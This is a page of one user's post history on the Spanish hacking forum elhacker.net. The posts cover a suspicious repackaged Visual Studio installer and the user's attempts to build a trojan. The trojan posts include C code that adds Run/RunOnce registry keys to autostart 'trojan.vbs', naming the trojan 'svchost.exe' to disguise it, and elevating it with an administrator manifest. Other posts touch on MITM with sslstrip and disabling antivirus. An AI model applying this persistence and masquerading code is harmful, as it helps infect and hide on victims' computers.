elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 ... 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 [66] 67 68 69 70 71 72 73 74 75 76 77
651  Informática / Software / Re: VisualStudio 2013 U. (Instalador+Plantillas+Snippets+Libs+Controles+Tools) en: 29 Septiembre 2014, 14:01 pm
Vaya acabo reinstalarlo desde cero, el antivirus volvió a saltar pero esta vez informe de falso positivo, la instalación continuo y continuo, volví a ejecutar el programa y estaba como la última vez que lo deje xD, todo iba lento y la CPU al 40%, demasiado lento como para que sea práctico, es por eso que lo voy a desinstalar, ya lo intenté 2 veces y no hay más que hacer probé cuanto pude para hacerlo funcionar positivamente. Si hay más gente que se lo ha instalado me gustará saber si ha tenido los mismos problemas que yo o si es que yo fuí la excepción, de todas formas gracias Elektro por el aporte aunque a mi ni me funcionó como me hubiera gustado, si no fuera por el consumo de CPU y el retardo hubiese estado perfecto.

Edito: Estoy tratando de desinstalarlo, es increíble, hay decenas o cientos de directorios que han sido modificados hoy a la hora de la instalación pero entro y no hay archivos de este día, desde directorios que no tienen nada que ver con el sistema como "C:\Program Files (x86)\GhostDoc" hasta la carpeta Windows o System32, que dicen que fueron modificadas pero sin embargo no hay archivos de este día y hora, pero fueron modificados a este día y hora, y así muchos directorios, ¿qué ocurre?. Lo desinstalé de panel de control todo, pero hay directorios que continúan, también había otro directorio que me llamo la atención "C:\Program files\Visual Studio 2013" a pesar de deisntalarlo este directorio persistió y no solo eso tenía un archivo llamado unistall.exe lo ejecuto y resultaba ser un archivo de instalación, la verdad solo quiero eliminar todo esto y dejar mi ordenador como antes   :-\

Es que es acojonante porque archivos que durante la instalación ví como se creaban en una shell (todos los del directorio GhostDoc)  en ese momento y se movieron me dice que son de 2013 y claro la hora a las 3:59 la de actualización de Windows, es sospechoso al menos para mí.

Saludos.
652  Informática / Software / Re: VisualStudio 2013 U. (Instalador+Plantillas+Snippets+Libs+Controles+Tools) en: 29 Septiembre 2014, 09:22 am
Vaya muchas gracias por la respuesta, he probado a desactivar el antivirus y no cambia nada, respecto a lo de "ToolBoxInstaller.exe"  si fue eso lo que me hizo saltar el antivirus, dices haberlo modificado pero tendré que creerte, puede que sea eso el causante de los fallos, o eso espero. Respecto a los directorios que crea el directorio de "C:\Users\Elektro\Documents\Visual Studio" no lo tengo, elegí no instalar elektro tools y demás porque no sabía lo que eran pero si me haces el favor de explicármelo me lo instalaría sin problema. También he probado a desamblar todas las extensiones y los problemas persistían, vaya después de todo parece que realicé una mala instalación, es por ello que voy a desinstalarlo todo y volverlo a instalar haber si funciona esta vez.

Gracias por tu respuesta, seguramente tengas toda la buena intención del mundo, pero suelo desconfiar siempre que instalo programas de terceros, supongo que tendré que reinstalarlo.

Edito: De todas formas podrías explicarme que son las "elektro tools" y ¿porqué se crea una carpeta aquí "C:\Users\Elektro\Documents\Visual Studio" o se debería de crear?, no sé eso no quiere decir que hay un usuario nuevo en mi ordenador llamado Elektro? xD

Explicanos un poco estas cosas y si se pueden prescindir de ellas o no.

Muchas gracias, Saludos.
653  Informática / Software / Re: VisualStudio 2013 U. (Instalador+Plantillas+Snippets+Libs+Controles+Tools) en: 28 Septiembre 2014, 23:34 pm
Saludos a todos, especialmente a elektro por el trabajo, la verdad estaba buscando instalarme el visual studio 2013 para programar cpp y este tema me vino como anillo al dedo, me le instale añadi blend y las librerias cpp, elegi no instalar unas cosas raras de elektro que no sabia lo que eran.

Y Bien procedi a la instalación durante la instalación me saltó el antivirus había un archivo llado BoxerControl.exe o algo asi, me decía que era troyano así que decidí eliminarlo, seguridad ante todo..

Tras finalizar la instalación mire procesos y carpetas nuevas y demás estaba hecho un lío.
Ejecuté el programa para mi sorpresa funcionaba, y lo cerré, al cabo de un rato lo volí a ejecutar para probar un proyecto de prueba y el programa iba lentísimo, al escribir un printf habia teclas que no recojia y las que recojia las hacia con retardo de hasta 2 segundos..

Todo iba lento los botones, cuando pasas el cursor por encima de algo para saber lo que es en fin todo iba pinzado. Puse el printf en el proyecto que creé y le di a compilar, pero sorpresa necesitaba la libreria .NET 4.5.1 que ya tenía instalada y me salian mensajes cada 2 segundos ventanas diciendo que lo descargara, no paraban de salir ventanas dando error y decidi cerrarlo pero sorpresa no se podia cerrar la aplicacion con el debugger funcionando, trate de detenerlo pero no encontre nada sorpresa, fuí al administrador de tareas y lo cerre.
 
Conclusión: Después de todo lo que me ha costado instalarme todo esto, y ver que va pinzado y que ni me funciona, me gustaría saber si soy el único al que le pasa o hay alguien que le ocurrio lo mismo y como trato de solucionarlo, lo del .NET puedo tratar de reinstalarlo y quizas se solucione o no, pero el programa va muy lento consume 40% de CPU y da muchos fallos no se si merecerá la pena y espero que lo haga después de todo lo arriesgado.

Saludos, espero respuesta
654  Programación / Programación C/C++ / Re: Microsoft visual studio 2012 en: 28 Septiembre 2014, 00:20 am
Vaya lo he estado leyendo hasta ahora, y la verdad la única diferencia que veo es que tu clave al final tiene "RunOnce" y la mia "Run", no se si será eso, pero es la primera diferencia de la que me percaté, lo pruebo y te comento.

De todas formas, es una cosa rara mi caso, ya que yo anclo al inicop un .vbs que me ejecutará en silencio el programa que tiene provilegios. Probando...

Edito: Vaya parece que no me funcionó, probé con esto:

Código
  1. int regKey,regOpen;
  2. char *path="C:\\Windows\\directorio\\trojan.vbs";
  3. HKEY hkey;
  4. regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
  5. if(regOpen==1)
  6.    {
  7.        printf("La clave ya esta creada\n");system("pause");
  8.    }
  9. else
  10. {
  11. regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
  12. if(regKey==0)
  13. {
  14. RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
  15. printf("Hemos creado la clave");
  16. system("pause");
  17. }
  18. else
  19.        {
  20.            printf("No se pudo crear la clave en el registro\n");
  21.            system("pause");
  22.        }
  23. }
  24.  
  25.  

Me dice que ha creado la clave reinició pero no se ejecuta el programa, no se que puede ser, según ví tu clave era igual que la mía entonces no entiendo por qué. Además los archivos siguen con necesitando el permiso del administrador para usarse TODOS, no solo el .exe me pregunto porqué será quizás sea porque están dentro del directorio de windows o no sé.

Destacar que el troyano se llama svchost.exe quizás influya ya que hay otro con el mismo nombre, pero no creo que sea ese el problema.

También he probado con esto:

Código
  1. HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Y me dice que no se pudo crear clave en el registro, vaya :(

Saludos
655  Seguridad Informática / Hacking / Re: Ayuda, redirigir de una URL a otra en: 28 Septiembre 2014, 00:01 am
Si, es necesario realizar un MITM para hacerlo, es algo que no merece la pena, pues sería un juego de niños en comparación con lo que puedes hacer si has conseguido hacer el MITM (sslstrip...). Accediendo al router supongo que también se podría hacer.

Saludos.
656  Seguridad Informática / Hacking / Re: Desactivar antivirus desde el cmd en: 27 Septiembre 2014, 23:58 pm
No leí del todo perdón, no creo que te funcione la manera que propone engel, más que nada porque un antivirus no se deja cerrar ni por el mismo usuario, a no ser que lo desinstale no se va, sino probad a cerrarlo desde el administrador de tareas.

Saludos.
657  Programación / Programación C/C++ / Re: Microsoft visual studio 2012 en: 27 Septiembre 2014, 23:53 pm
Vaya me alegra que sepas a lo que me refiero xD, pues tengo esto:

Código
  1. int regKey,regOpen;
  2. char *path="C:\\Windows\\directorio\\trojan.vbs";
  3. HKEY hkey;
  4. regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  5. if(regOpen==1)
  6.    {
  7.        printf("La clave ya esta creada\n");system("pause");
  8.    }
  9. else
  10. {
  11. regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  12. if(regKey==0)
  13. {
  14. RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
  15. printf("Hemos creado la clave");
  16. system("pause");
  17. }
  18. else
  19.        {
  20.            printf("No se pudo crear la clave en el registro\n");
  21.            system("pause");
  22.        }
  23. }
  24.  
  25.  

No se como va eso, ¿dónde debería de meter lo de HKLM para que me funcione? O al menos intentarlo, muchas gracias por la ayuda.
658  Programación / Programación C/C++ / Re: Microsoft visual studio 2012 en: 27 Septiembre 2014, 18:27 pm
Hola compañeros tengo un problema relacionado con la anterior y prefiero no abrir nuevo tema, conseguí dar privilegios a la aplicación, pero al parecer una vez aceptados estos por mi, la aplicación no es capaz de ejecutarse al reiniciar pues a pesar de anclarla al registro reinicio y no se ejecuta pienso que puede estar relacionado con esos permisos.

¿Alguien sabe por que ocurre esto, alguna solución o manera de evitar que ocurra?.

La aplicación es incapaz de autoejecutarse en el reinicio por que requiere permisos de administrador que ya no necesita pues ya hizo uso de ellos en el pasado, ayuda.
659  Programación / Programación C/C++ / Re: Microsoft visual studio 2012 en: 26 Septiembre 2014, 12:05 pm
Hola kurbox, la verdad estoy primero probando con mt.exe que me he bajado de internet y que he examinado en virus total, los descargo desde ésta página:

http://es.originaldll.com/file/mt.exe/21861.html

He probado 2 y no funciona, solo quiero saber que descartáis problemas en el manifiesto o que este haciendo otra cosa mal que pase por alto, si todo va bien y solo falla el mt.exe instalare el SDK, como última opción.

Edito: Me da un error al usar el segundo comando como indica en esta página no se por que puede ser: "mt.exe : command line error c1010007: Unexpected/Unknown option
"Release\cpp\sca\runtime\core\src\.libs/tuscany_sca.dll;2".  Use the /?
option for help on usage and samples."

http://mail-archives.apache.org/mod_mbox/tuscany-dev/200712.mbox/%3C55e2bf7e0712051558u6faa85b7x3450c117968bbe49@mail.gmail.com%3E

Saludos.



BIEEEN, ya lo conseguí lo hice descargando el mt.exe de la página que puse en el anterior comentario, el comando final fue el siguiente:

Código:
mt.exe -nologo -manifest "archivo.exe.manifest" -outputresource:"archivo.exe;#1

Gracias por la ayuda, y tema cerrado :)
660  Programación / Programación C/C++ / Re: Microsoft visual studio 2012 en: 25 Septiembre 2014, 20:03 pm
Hola compa, la verdad al final no pude instalarlo y no fue por falta de intentos, es por ello que directamente me descargue de internet mt.exe, está sin virus, y he probado a hacer esto:

Código:
mt.exe –manifest programa.exe.manifest -outputresource:programa.exe;1

En el programa.exe.manifest tengo esto:

Código:
Executable: programa.exe 
Manifest: programa.exe.manifest
Sample application manifest file:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0"
     processorArchitecture="X86"
     name="programa"
     type="win32"/>
  <description>Description of your application</description>
  <!-- Identify the application security requirements. -->
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel
          level="requireAdministrator"
          uiAccess="false"/>
        </requestedPrivileges>
       </security>
  </trustInfo>
</assembly>

Y bien, lo ejecuto y me salia un error: "could no write file for writting.archivo"

Probé a poner esto y no me salió error:
Código:
mt.exe –manifest programa.exe.manifest -outputresource programa.exe;1

Tampoco con este otro comando, sin embargo continuó sin funcionar:

Código:
mt.exe -nologo -manifest "r:\shared\hl.exe.manifest" -outputresource:"r:\shared\hl33m.exe;1"

Lo ejecuté y no me salió nada, no aparecío nada, y la aplicación seguía intacta solo que daba error al ejecutar: "No se pudo iniciar la aplicación la configuración en paralelo no es correcta, consulte sxstrace.exe para obtener más detalles".

Ayuda pls.
Páginas: 1 ... 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 [66] 67 68 69 70 71 72 73 74 75 76 77
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines